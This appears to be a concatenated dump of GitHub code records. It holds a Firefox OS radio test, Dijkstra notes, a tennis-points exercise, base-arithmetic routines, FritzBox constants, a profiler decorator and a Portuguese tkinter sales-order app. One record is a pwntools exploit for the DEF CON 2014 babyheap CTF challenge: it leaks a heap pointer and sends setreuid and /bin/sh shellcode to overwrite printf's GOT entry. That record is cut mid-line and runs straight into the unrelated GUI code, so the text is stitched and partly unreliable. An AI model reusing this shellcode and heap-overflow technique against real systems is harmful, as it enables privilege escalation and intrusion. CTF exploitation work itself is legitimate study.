{\n window.wrappedJSObject.rcvd_error = true;\n };\n marionetteScriptFinished(1);\n \"\"\", script_args=[turning_on])\n\n # wait for radio to change state\n wait = Wait(self.marionette, timeout=10, interval=0.5)\n try:\n wait.until(lambda x: x.execute_script(\"return window.wrappedJSObject.rcvd_success\"))\n except:\n if self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_error\"):\n if turning_on:\n self.fail(\"MozFMRadio.enable returned error\")\n else:\n self.fail(\"MozFMRadio.disable returned error\")\n else:\n if turning_on:\n self.fail(\"Failed to turn on the fm radio\")\n else:\n self.fail(\"Failed to turn off the fm radio\")\n\n def rcvd_radio_on(self):\n return self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_radio_on\")\n\n def rcvd_radio_off(self):\n return self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_radio_off\")\n","repo_name":"mozilla-b2g/fxos-certsuite","sub_path":"mcts/webapi_tests/fm_radio/fm_radio_test.py","file_name":"fm_radio_test.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"31099701950","text":"# -*- coding: utf-8 -*-\n\n# Notice it's almost identical to prim.\n# In Prim (MSP) we add the next vertex of\n# min weight. In SP we add the closest\n# to s, the new edge weight plus the distance\n# from s to the tree vertex it connects to\n\n# There is a Dijkstra version with runtime\n# O(E+V*log(V)) but requires heap.decrease_priority()\n\nfrom collections import defaultdict\nimport heapq\n\n\nclass Graph:\n def __init__(self, vertices):\n self.vertices = vertices\n self.edges = defaultdict(set)\n\n def insert(self, v, edges, directed=False):\n for y, weight in edges:\n self.edges[v].add((y, weight))\n if not directed:\n self.insert(y, [(v, weight)], directed=True)\n\n\n# from book\ndef dijkstra(graph, start):\n # is in SPT\n in_tree = defaultdict(lambda: False)\n # cost of adding to tree\n distance = defaultdict(lambda: float('inf'))\n # to construct the SPT\n parent = defaultdict(lambda: None)\n\n distance[start] = 0\n v = start\n while not in_tree[v]:\n print('Inserted vertex=%r' % v)\n in_tree[v] = True\n for y, weight in graph.edges[v]:\n if distance[y] > distance[v]+weight and not in_tree[y]:\n distance[y] = distance[v]+weight\n parent[y] = v\n # select edge of min weight\n v = start\n dist = float('inf')\n for y in graph.vertices:\n if not in_tree[y] and dist > distance[y]:\n dist = distance[y]\n v = y\n\n return dict(distance), dict(parent)\n\n\n# runtime (V²)\ndef dijkstra2(graph, start):\n parent = {}\n dist = defaultdict(lambda: float('inf'))\n dist[start] = 0\n queue = set(graph.vertices)\n while queue:\n _, v = min((dist[v], v) for v in queue)\n queue.remove(v)\n for y, weight in graph.edges[v]:\n if y not in queue:\n continue\n alt = dist[v] + weight\n if alt < dist[y]:\n dist[y] = alt\n parent[y] = (weight, v)\n return parent\n\n\n# faster dijkstra. Broken since decrease_priority\n# does not exist in heapq\ndef dijkstra3(graph, start):\n def decrease_priority_or_insert(q, weight, v):\n pass\n parent = {}\n dist = defaultdict(lambda: float('inf'))\n dist[start] = 0\n queue = [(0, start)]\n while queue:\n _, v = heapq.heappop(queue)\n for y, weight in graph.edges[v]:\n alt = dist[v] + weight\n if alt < dist[y]:\n dist[y] = alt\n parent[y] = (weight, v)\n decrease_priority_or_insert(queue, alt, y)\n return dict(parent)\n\n\n# Figure 6.3\ng1 = Graph('abcdefg')\ng1.insert('a', [('b', 5), ('c', 7), ('d', 12)])\ng1.insert('b', [('e', 7), ('c', 9)])\ng1.insert('c', [('d', 4), ('e', 4), ('f', 3)])\ng1.insert('d', [('f', 7)])\ng1.insert('e', [('f', 2), ('g', 5)])\ng1.insert('f', [('g', 2)])\nprint(dijkstra(g1, start='a'))\n# Inserted vertex='a'\n# Inserted vertex='b'\n# Inserted vertex='c'\n# Inserted vertex='f'\n# Inserted vertex='d'\n# Inserted vertex='e'\n# Inserted vertex='g'\n# {'b': 'a', 'c': 'a', 'd': 'c', 'e': 'c', 'f': 'c', 'g': 'f'}\n\nprint(dijkstra2(g1, start='a'))\n# {'d': 'c', 'b': 'a', 'c': 'a', 'e': 'c', 'f': 'c', 'g': 'f'}\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/06_00_dijkstra.py","file_name":"06_00_dijkstra.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35446389624","text":"from math import floor\n\ncup_nums = int(input())\nstart_points = int(input())\n\ncup_points = 0\n\nwins_count = 0\n\nfor cup in range(cup_nums):\n stage = input()\n if stage == \"W\":\n cup_points += 2000\n wins_count += 1\n elif stage == \"F\":\n cup_points += 1200\n elif stage == \"SF\":\n cup_points += 720\n\n# The average of a set of numbers is simply the sum of the numbers divided by the total number of values in the set.\navg_points = floor(cup_points / cup_nums) # колко точки средно печели от всички изиграни турнири\nperc_wins = (wins_count / cup_nums) * 100 # колко процента от турнирите е спечелил\ntotal_points = cup_points + start_points\n\nprint(f\"Final points: {total_points}\")\nprint(f\"Average points: {avg_points}\")\nprint(f\"{perc_wins:.2f}%\")\n","repo_name":"maon0002/Programming-Basics-with-Python-July-September-2022","sub_path":"for_loop__exercise/08_tennis_ranklist.py","file_name":"08_tennis_ranklist.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39386879103","text":"\"\"\"\n@author: Ioana Gabor\n\"\"\"\n\nfrom number import Number\n\n\nclass Operations:\n @staticmethod\n def add(first_number, second_number):\n \"\"\"Adds two Numbers or raises ValueError if the Numbers have different bases\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n result = []\n carry = 0\n digits1.reverse()\n digits2.reverse()\n if len(digits1) < len(digits2):\n digits1 += [0 for _ in range(len(digits2) - len(digits1))]\n elif len(digits1) > len(digits2):\n digits2 += [0 for _ in range(len(digits1) - len(digits2))]\n\n for d in range(len(digits2)):\n sum = (digits2[d] + digits1[d] + carry)\n carry = sum // base\n result.append(sum % base)\n if carry:\n result.append(carry)\n result.reverse()\n return Number(result, base)\n\n @staticmethod\n def compare(first_number, second_number):\n \"\"\"Compares two numbers\n\n :param first_number: Number\n :param second_number:Number\n :return: -1 if first < second, 0 if first == second, 1 if first > second\n \"\"\"\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n if len(digits1) < len(digits2):\n return -1\n if len(digits1) > len(digits2):\n return 1\n for d in range(len(digits1)):\n if digits1[d] < digits2[d]:\n return -1\n elif digits1[d] > digits2[d]:\n return 1\n return 0\n\n @staticmethod\n def subtract(first_number, second_number):\n \"\"\"Subtracts two Numbers or raises ValueError if the Numbers have different bases or if the first one is smaller\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n if Operations.compare(first_number, second_number) < 0:\n raise ValueError(\"The first number can't be larger than the second number!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n result = []\n borrow = 0\n digits1.reverse()\n digits2.reverse()\n if len(digits1) > len(digits2):\n digits2 += [0 for _ in range(len(digits1) - len(digits2))]\n\n for d in range(len(digits1)):\n if digits1[d] + borrow >= digits2[d]:\n current_digit = (digits1[d] + borrow - digits2[d]) % base\n borrow = 0\n else:\n current_digit = (digits1[d] + borrow + base - digits2[d]) % base\n borrow = -1\n result.append(current_digit)\n while len(result) > 1 and result[-1] == 0:\n result.pop(len(result) - 1)\n result.reverse()\n return Number(result, base)\n\n @staticmethod\n def multiply(first_number, second_number):\n \"\"\"Multiplies two Numbers or raises ValueError if the Numbers have different bases or if the second one has more than one digit\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n if len(digits2) > 1:\n raise ValueError(\"The second number should have only one digit!\\n\")\n digit2 = digits2[0]\n digits1.reverse()\n result = []\n carry = 0\n for d in range(len(digits1)):\n prod = digits1[d] * digit2 + carry\n carry = prod // base\n result.append(prod % base)\n if carry:\n result.append(carry)\n while len(result) > 1 and result[-1] == 0:\n result = result[:-1]\n result.reverse()\n return Number(result, base)\n\n @staticmethod\n def divide(first_number, second_number):\n \"\"\"Divides two Numbers or raises ValueError if the Numbers have different bases or if the second one has more than one digit\n or if the second one is 0.\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n if second_number.is_zero():\n raise ZeroDivisionError(\"Cannot divide by 0!\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n if len(digits2) > 1:\n raise ValueError(\"The second number should have only one digit!\\n\")\n digit2 = digits2[0]\n result = []\n remainder = 0\n for d in range(len(digits1)):\n current_digit = (remainder * base + digits1[d]) // digit2\n remainder = (remainder * base + digits1[d]) % digit2\n result.append(current_digit)\n while result[0] == 0 and len(result) > 1:\n result.pop(0)\n return Number(result, base), Number([remainder], base)\n\n#\n# if __name__ == \"__main__\":\n# print(Operations.divide(Number.get_number_from_string_representation(\"123\", 4),\n# Number.get_number_from_string_representation(\"3\", 4))[0])\n","repo_name":"IoanaGabor/University","sub_path":"Semester-1/Computational Logic/bases_operations_conversions/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38532120907","text":"__version__ = 0.9\n__author___ = 'Wagner Matthias'\n\nLOGGING_CONFIG_FORMAT = \"%(asctime)s - %(message)s\"\n\nFRITZBOX_TIMESTAMP_DELTA_MAX = 60 # Max age of old value, after x minutes the value will be written again, also if DELTA_MIN is not exceeded\n\nFRITZBOX_TEMPERATURE_PARAMETER_NAME = 'NewTemperatureCelsius'\nFRITZBOX_TEMPERATURE_PARAMETER_VALID = 'NewTemperatureIsValid'\nFRITZBOX_TEMPERATURE_PARAMETER_ENABLED = 'NewTemperatureIsEnabled'\nFRITZBOX_TEMPERATURE_PARAMETER_OFFSET = 'NewTemperatureOffset'\nFRITZBOX_TEMPERATURE_DELTA_MIN = 0.49 # Only write values if delta is reached\nFRITZBOX_TEMPERATURE_FACTOR = 0.1 # Factor for multiplication \n\nFRITZBOX_HKR_VALVE_STAT_PARAMETER_NAME = 'NewHkrSetVentilStatus'\nFRITZBOX_HKR_VALVE_REDUCED_PARAMETER_NAME = 'NewHkrReduceVentilStatus'\nFRITZBOX_HKR_VALVE_COMFORT_PARAMETER_NAME = 'NewHkrComfortVentilStatus'\nFRITZBOX_HKR_TEMP_REDUCED_PARAMETER_NAME = 'NewHkrReduceTemperature'\nFRITZBOX_HKR_TEMP_COMFORT_PARAMETER_NAME = 'NewHkrComfortTemperature'\nFRITZBOX_HKR_VALID_PARAMETER_NAME = 'NewHkrIsValid'\nFRITZBOX_HKR_ENABLED_PARAMETER_NAME = 'NewHkrIsEnabled'\nFRITZBOX_HKR_TEMP_REDUCED_FACTOR = 0.1\nFRITZBOX_HKR_TEMP_COMFORT_FACTOR = 0.1\n\nFRITZBOX_POWER_PARAMETER_NAME = 'NewMultimeterPower'\nFRITZBOX_POWER_PARAMETER_VALID = 'NewMultimeterIsValid'\nFRITZBOX_POWER_PARAMETER_ENABLED = 'NewMultimeterIsEnabled'\nFRITZBOX_POWER_DELTA_MIN = 1 # Only write values if delta is reached\nFRITZBOX_POWER_FACTOR = 0.01 # Factor for multiplication \n\n","repo_name":"W61g6E65R/MeiFritzBoxConnectorrr","sub_path":"modules/globalConstants.py","file_name":"globalConstants.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17118981092","text":"class Colors(object):\n RED = '\\033[1;41m'\n GREEN = '\\033[1;42m'\n YELLOW = '\\033[1;43m'\n BLUE = '\\033[1;44m'\n MAGENTA = '\\033[1;45m'\n CYAN = '\\033[1;46m'\n ENDC = '\\033[0m'\n\n\ndef timeit(logger, fmt, threshold):\n from json import dumps\n import time\n\n def is_json(json_data):\n try:\n json_object = dumps(json_data, indent=4)\n except ValueError:\n return False\n else:\n return json_object\n\n def timereald(method):\n def timed(*args, **kw):\n start = time.clock()\n result = method(*args, **kw)\n end = time.clock()\n\n try:\n obj, value = args\n data = is_json(value) if False else value\n except Exception:\n data = is_json(args) if False else args\n\n sec = (end - start)\n sec_color = Colors.RED\n if sec <= threshold[0]:\n sec_color = Colors.BLUE\n elif sec <= threshold[1]:\n sec_color = Colors.GREEN\n\n if fmt == 'simple':\n logger.debug(\"\\nName: %r\\nClock: %s%2.8f%s sec\\n\" %\n (method.__name__,\n sec_color,\n sec,\n Colors.ENDC,\n ))\n elif fmt == 'verbose':\n logger.debug(\n \"\\nName: %r\\nClock: %s%2.8f%s sec\\nObj: %s\\nkw: %s\\n%s\\n\" %\n (method.__name__,\n sec_color,\n sec,\n Colors.ENDC,\n obj,\n kw,\n data,\n ))\n return result\n return timed\n return timereald\n","repo_name":"deoplete-plugins/deoplete-clang","sub_path":"rplugin/python3/deoplete/sources/deoplete_clang/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"53"} +{"seq_id":"12252453734","text":"from pwn import *\nimport re\ndef main():\n\t\"\"\"\n\t\tdefcon-2014-babyheap\n\t\"\"\"\n\tHOST = \"192.168.56.101\"\n\tPORT = 49158\n\tconn = remote(HOST,PORT)\n\tdata = conn.recvuntil(\"Write to object [size=260]:\")\n\traw_input(\"$\")\n\n\t#Get Heap pointer to shellcode\n\tmy_loc = re.findall(\"\\[ALLOC\\]\\[loc=(.*)\\]\\[size=260\\]\",data)\n\tmy_ptr = int(my_loc[0],16)\n\tprint (\"HEAP ADR:%s\"%hex(my_ptr))\n\n\t#setreuid /bin/sh\n\tshellcode_length = 252\n\tshellcode = \"\\xeb\\x0c\"\n\tshellcode = shellcode + \"\\x90\"*40 + \"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\\xcd\\x80\"\n\tshellcode = shellcode + \"\\x90\"*(shellcode_length-len(shellcode))\n\t\n\t#printf .got pointer\t\n\tpf_ptr = struct.pack(\" 0:\n nome_cliente = combo_cliente.get()\n data = entry_data.get()\n prazo = combo_prazo.get()\n if prazo == \"A vista\":\n data_vencimento = datetime.date.today()\n data_vencimento = data_vencimento.strftime(\"%d/%m/%Y\")\n else:\n prazo = int(prazo.split(\" \")[0].strip())\n data_vencimento = somar_dias_uteis(prazo)\n with open(\"config/arquivos/lista_clientes.txt\", \"r\") as arquivo:\n lista_clientes_buscar = arquivo.readlines()\n for cliente in lista_clientes_buscar:\n razao_social = cliente.split(\" | \")[1].strip()\n if razao_social == nome_cliente:\n codigo_cliente_omie = cliente.split(\" | \")[0].strip()\n break\n lista_nome_produtos_selecionados = []\n lista_valor_selecionados = []\n lista_quantidade_selecionados = []\n lista_codigo_produtos_selecionados = []\n lista_unidade_selecionados = []\n lista_projeto_selecionados = []\n lista_ncm_selecionados = []\n lista_cfop_selecionados = []\n lista_pedidos_venda = []\n dict_pedido_venda = {}\n \n for linha in prods_selecionados: \n linha = linha.split(\" | \")\n nome_produto = linha[0]\n quantidade_prod = float(linha[1].strip())\n valor = linha[2].strip()\n valor = float(valor.replace(\"\\n\", \"\"))\n cfop, codigo_produto, descricao, ncm, unidade, valor_unitario = pesquisar_produto_nome_func(nome_produto)\n codigo_projeto = get_cod_projeto(nome_produto)\n dict_det = {\n \"ide\": {\n \"codigo_item_integracao\": \"4422421\"\n },\n \"produto\": {\n \"cfop\": cfop,\n \"codigo_produto\": codigo_produto,\n \"descricao\": descricao,\n \"ncm\": ncm,\n \"quantidade\": quantidade_prod,\n \"unidade\": unidade,\n \"valor_unitario\": valor\n }\n }\n \n lista_det.append(dict_det) \n lista_nome_produtos_selecionados.append(nome_produto)\n lista_codigo_produtos_selecionados.append(codigo_produto)\n lista_quantidade_selecionados.append(quantidade_prod)\n lista_valor_selecionados.append(valor)\n lista_cfop_selecionados.append(cfop)\n lista_ncm_selecionados.append(ncm)\n lista_projeto_selecionados.append(codigo_projeto)\n lista_unidade_selecionados.append(unidade)\n with open(f\"config/arquivos/temp_lista_det_{codigo_cliente_omie}.txt\", \"w\") as arquivo:\n arquivo.write(str(lista_det))\n dict_pedido_venda = {\n \"valor\": lista_valor_selecionados,\n \"razao_social\": razao_social,\n \"codigo_produto\": lista_codigo_produtos_selecionados,\n \"codigo_cliente_omie\": codigo_cliente_omie,\n \"data_vencimento\": data_vencimento,\n \"cfop\": lista_cfop_selecionados,\n \"descricao\": lista_nome_produtos_selecionados,\n \"ncm\": lista_ncm_selecionados,\n \"unidade\": lista_unidade_selecionados, \n \"quantidade_prod\": lista_quantidade_selecionados, \n \"codigo_projeto\": lista_projeto_selecionados\n }\n with open(\"config/arquivos/lista_det.txt\", \"w\") as arquivo:\n arquivo.write(str(lista_det))\n lista_titulos = [\"valor\", \"razao_social\"]\n lista_pedidos_venda.append(dict_pedido_venda)\n with open(\"config/arquivos/dados_venda.txt\", \"w\") as arquivo:\n arquivo.write(f\"{codigo_cliente_omie} | {data_vencimento}\")\n text_venda.configure(state=\"normal\") \n for dict_pedido_venda in lista_pedidos_venda:\n for chave, valor in dict_pedido_venda.items(): \n for titulo in lista_titulos:\n if chave == titulo:\n if chave == \"razao_social\": \n text_venda.insert(f\"0.0\", f\"Cliente: {valor}\\n\")\n if chave == \"valor\":\n lista_quantidade = dict_pedido_venda[\"quantidade_prod\"]\n lista_preco = dict_pedido_venda[\"valor\"]\n total = 0\n for quantidade, preco in zip(lista_quantidade, lista_preco):\n total += quantidade * preco\n text_venda.insert(f\"1.0\", f\"Valor: R$ {total}\\n\\n\")\n text_venda.insert(f\"1.0\", f\"Data: {data}\\n\")\n break\n text_venda.configure(state=\"disabled\")\n limpar_prods_selecionados()\n def voltar_prod_func():\n #NOTE - voltar_prod_func\n janela_pedido_venda.destroy()\n sub_janela_relatorio.deiconify()\n sub_janela_relatorio.state(\"zoomed\")\n def inicio_prod_func():\n #NOTE - inicio_prod_func\n janela_pedido_venda.destroy()\n sub_janela_relatorio.destroy()\n def get_codigo(nome_produto):\n #NOTE - get_codigo\n \"\"\"Pega o codigo do produto na lista de produtos\n \n param:\n - string: nome_produto\n \n return:\n - string: codigo\"\"\"\n with open(\"config/arquivos/lista_produtos.txt\", \"r\") as arquivo:\n lista_produtos = arquivo.readlines()\n nome_produto_aux= nome_produto.replace(\" \", \"\")\n for produto in lista_produtos: \n produto = produto.split(\"|\")\n nome = produto[1]\n nome_aux = nome.replace(\" \", \"\")\n if str(nome_produto_aux) in str(nome_aux):\n codigo = produto[0]\n codigo = codigo.replace(\" \", \"\")\n break\n return codigo\n def btn_pedido_venda_func(): \n #NOTE - btn_pedido_venda_func\n pyautogui.alert(text=\"Aguarde...\") \n with open(\"config/arquivos/codigo_local_estoque_aux.txt\", \"r\") as arquivo:\n codigo_local_estoque = arquivo.read()\n codigo_local_estoque = codigo_local_estoque.strip() \n with open(\"config/arquivos/lista_det.txt\", \"r\") as arquivo:\n lista_det = arquivo.read()\n lista_det = ast.literal_eval(lista_det)\n with open(\"config/arquivos/dados_venda.txt\", \"r\") as arquivo:\n dados_venda = arquivo.read()\n data_vencimento = dados_venda.split(\" | \")[1].strip()\n arquivos = os.listdir(\"config/arquivos\")\n venda = False\n for arquivo_dir in arquivos:\n if \"temp_lista_det_\" in arquivo_dir:\n codigo_cliente_omie = arquivo_dir.split(\"_\")[3]\n codigo_cliente_omie = codigo_cliente_omie.split(\".\")[0]\n with open(f\"config/arquivos/{arquivo_dir}\") as arquivo:\n temp_det = arquivo.read()\n temp_det = ast.literal_eval(temp_det)\n with open(\"config/arquivos/lista_departamentos.txt\", \"r\") as arquivo:\n lista_departamentos = arquivo.readlines()\n departamentos = []\n tamanho_lista = float(len(temp_det))\n nPerc = float(100 / tamanho_lista)\n if nPerc == 100.0000000:\n nPerc = f\"{nPerc:.6f}\"\n else:\n nPerc = f\"{nPerc:.7f}\"\n for dict_det in temp_det:\n produtos = dict_det[\"produto\"]\n descricao = produtos[\"descricao\"]\n nValor = produtos[\"valor_unitario\"] * produtos[\"quantidade\"]\n for departamento in lista_departamentos:\n nome_departamento = departamento.split(\" | \")[1].strip()\n if nome_departamento == descricao:\n codigo_departamento = departamento.split(\" | \")[0].strip()\n dict_departamentos = {\n \"cCodDepto\": codigo_departamento,\n \"nPerc\": nPerc,\n \"nValor\": nValor,\n \"nValorFixo\": \"S\"\n }\n departamentos.append(dict_departamentos)\n \n incluir_pedido_venda_lot(temp_det, codigo_cliente_omie, data_vencimento, departamentos)\n venda = True\n os.remove(f\"config/arquivos/{arquivo_dir}\") \n for dict_det in temp_det:\n produtos = dict_det[\"produto\"]\n descricao = produtos[\"descricao\"]\n quantidade = produtos[\"quantidade\"]\n obs_ent = \"Produto vendido de caminhão. Aguardando baixa pelo relatório\"\n obs_sai = \"Produto vendido\"\n codigo_produto = get_codigo(descricao)\n cfop, codigo_produto, descricao, ncm, unidade, valor_unitario = pesquisar_produto_cod_func(codigo_produto)\n incluir_ajuste_estoque(codigo_produto, quantidade, 'SAI', valor_unitario, obs_sai, codigo_local_estoque)\n incluir_ajuste_estoque(codigo_produto, quantidade, 'ENT', valor_unitario, obs_ent, codigo_local_estoque_galpao)\n if venda == True:\n sub_janela_alerta_sucesso()\n janela_pedido_venda.destroy()\n sub_janela_relatorio.deiconify()\n sub_janela_relatorio.state(\"zoomed\")\n produtos_nao_retornados = diferenca_quantidade_estoque_produto(codigo_local_estoque)\n atualizar_func()\n #!SECTION\n \n\n #SECTION - Centro\n #NOTE - frame_meio\n frame_meio = ctk.CTkFrame(\n master=janela_pedido_venda,\n width=1300,\n height=550,\n fg_color=\"transparent\"\n )\n frame_meio.place(relx=0.5, rely=0.5, anchor=tkinter.CENTER)\n\n #NOTE - frame_central\n frame_central = ctk.CTkFrame(\n master=frame_meio,\n width=300,\n height=360,\n fg_color= (\"#3b3b3b\")\n )\n frame_central.place(relx=0.5, rely=0.55, anchor=tkinter.CENTER)\n\n #NOTE - btn_voltar\n img_voltar = ctk.CTkImage(light_image=Image.open(\"config/arquivos/img/voltar.png\"), size=(30,30))\n btn_voltar = ctk.CTkButton(\n master=frame_meio,\n width=15,\n height=15,\n text=\"Voltar\",\n font=(font_btn, 15),\n #image=img_voltar,\n #fg_color=\"transparent\",\n command=voltar_prod_func\n )\n btn_voltar.place(relx=0.39, rely=0.08)\n img_home = ctk.CTkImage(light_image=Image.open(\"config/arquivos/img/home.png\"), size=(30,30))\n #NOTE - btn_inicio\n btn_inicio = ctk.CTkButton(\n master=frame_meio,\n width=15,\n height=15,\n text=\"Início\",\n font=(font_btn, 15),\n #image=img_home,\n #fg_color=\"transparent\",\n command=inicio_prod_func\n )\n btn_inicio.place(relx=0.44, rely=0.08)\n\n #NOTE - label_titulo\n label_titulo = ctk.CTkLabel(\n master=frame_meio,\n text=\"Criar Pedido de Venda\",\n font=(\"arial\", 18, \"bold\")\n )\n label_titulo.place(relx=0.5, rely=0.18, anchor=tkinter.CENTER)\n\n #NOTE - label_pesquisar_prod\n label_pesquisar_prod = ctk.CTkLabel(\n master=frame_meio,\n text=\"Produtos\",\n font= (font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_pesquisar_prod.place(relx=0.43, rely=0.30, anchor=tkinter.CENTER) \n \n #NOTE - combo_pesquisar_prod\n with open(\"config/arquivos/quant_diferenca_estoque.txt\", \"r\") as arquivo:\n quant_diferenca_estoque = arquivo.readlines()\n for i, produto in enumerate(quant_diferenca_estoque):\n quant_diferenca_estoque[i] = str((produto.split(\" | \"))[1]).replace(\"\\n\",\"\")\n combo_pesquisar_prod = ctk.CTkComboBox(\n master=frame_meio,\n values=quant_diferenca_estoque,\n width=150,\n height=25, \n )\n combo_pesquisar_prod.place(relx=0.53, rely=0.30, anchor=tkinter.CENTER)\n combo_pesquisar_prod.bind(\"\", pesquisar_prod_func)\n\n #NOTE - label_quantidade \n label_quantidade = ctk.CTkLabel(\n master=frame_meio,\n text=\"Quantidade\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_quantidade.place(relx=0.43, rely=0.36, anchor=tkinter.CENTER) \n\n #NOTE - entry_quantidade\n entry_quantidade = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_quantidade.place(relx=0.53, rely=0.36, anchor=tkinter.CENTER)\n\n #NOTE - label_valor \n label_valor = ctk.CTkLabel(\n master=frame_meio,\n text=\"Valor Un.\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_valor.place(relx=0.43, rely=0.42, anchor=tkinter.CENTER) \n\n #NOTE - entry_valor\n entry_valor = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_valor.place(relx=0.53, rely=0.42, anchor=tkinter.CENTER)\n entry_valor.bind(\"\", adicionar_prod_btn_event_func)\n\n #NOTE - btn_adicionar_produto\n btn_adicionar_produto = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Adicionar Produto\",\n font=(font_btn, 15),\n border_width=0,\n command = adicionar_prod_btn_func)\n btn_adicionar_produto.place(relx=0.53, rely=0.50, anchor=ctk.CENTER)\n #NOTE - btn_remover_ultimo\n btn_remover_ultimo = ctk.CTkButton(\n master=frame_meio,\n width=125,\n height=25,\n text=\"Remover último produto\",\n font=(font_btn, 13),\n command = remover_ultimo_btn_func)\n btn_remover_ultimo.place(relx=0.53, rely=0.56, anchor=ctk.CENTER)\n #NOTE - btn_limpar \n btn_limpar = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Limpar\",\n font=(font_btn, 15),\n command = limpar_prods_selecionados)\n btn_limpar.place(relx=0.53, rely=0.62, anchor=ctk.CENTER)\n \n #NOTE - label_clientes\n label_clientes = ctk.CTkLabel(\n master=frame_meio,\n text=\"Cliente\",\n fg_color=cor_frame_meio,\n font= (font_texto, 13, \"bold\"),\n )\n label_clientes.place(relx=0.43, rely=0.68, anchor=tkinter.CENTER)\n\n #NOTE - combo_cliente\n combo_cliente = ctk.CTkComboBox(\n master=frame_meio,\n values=lista_clientes,\n width=150,\n height=25,\n )\n combo_cliente.place(relx=0.53, rely=0.68, anchor=tkinter.CENTER)\n combo_cliente.bind(\"\", pesquisar_cliente_func)\n\n #NOTE - label_data \n label_data = ctk.CTkLabel(\n master=frame_meio,\n text=\"Data\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_data.place(relx=0.43, rely=0.74, anchor=tkinter.CENTER) \n\n #NOTE - entry_data\n entry_data = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_data.place(relx=0.53, rely=0.74, anchor=tkinter.CENTER)\n\n\n #NOTE - label_prazo \n label_prazo = ctk.CTkLabel(\n master=frame_meio,\n text=\"Prazo\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_prazo.place(relx=0.43, rely=0.80, anchor=tkinter.CENTER) \n\n #NOTE - entry_prazo\n lista_prazo = [\"A vista\",\n \"7 dias\",\n \"14 Dias\",\n \"21 Dias\",\n \"30 Dias\",\n \"45 Dias\",\n \"60 Dias\"]\n combo_prazo = ctk.CTkComboBox(master=frame_meio,\n values=lista_prazo,\n width=150,\n height=25)\n combo_prazo.place(relx=0.53, rely=0.80, anchor=tkinter.CENTER)\n\n #NOTE - btn_concluir_cliente\n btn_concluir_cliente = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Concluir Cliente\",\n font=(font_btn, 15),\n command=concluir_cliente_func\n )\n btn_concluir_cliente.place(relx=0.53, rely=0.85, anchor=tkinter.CENTER)\n\n #NOTE - btn_gerar_pedido_venda\n btn_gerar_pedido_venda = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Gerar pedido de venda\",\n font=(font_btn, 15),\n fg_color=\"#00993D\",\n hover_color=(\"#007830\"),\n command=btn_pedido_venda_func\n )\n btn_gerar_pedido_venda.place(relx=0.53, rely=0.93, anchor=tkinter.CENTER)\n #!SECTION\n\n #SECTION - Direita\n \n #NOTE - text_prod_selecionados\n text_prod_selecionados = ctk.CTkTextbox(\n master=frame_meio,\n width=300,\n height=230,\n font=(\"Arial\", 12)\n )\n text_prod_selecionados.place(relx=0.74, rely=0.27, anchor=tkinter.CENTER)\n text_prod_selecionados.configure(state=\"disabled\")\n\n #NOTE - label_prod_selecionados\n label_prod_selecionados = ctk.CTkLabel(\n master=frame_meio,\n text=\"Produtos Selecionados\",\n font=(\"Arial\", 15, \"bold\"),\n fg_color=cor_fundo\n )\n label_prod_selecionados.place(relx=0.74, rely=0.03, anchor=tkinter.CENTER)\n\n #NOTE - text_venda\n text_venda = ctk.CTkTextbox(\n master=frame_meio,\n width=300,\n height=230,\n font=(\"Arial\", 12)\n )\n text_venda.place(relx=0.74, rely=0.75, anchor=tkinter.CENTER)\n text_venda.configure(state=\"disabled\")\n\n #NOTE - 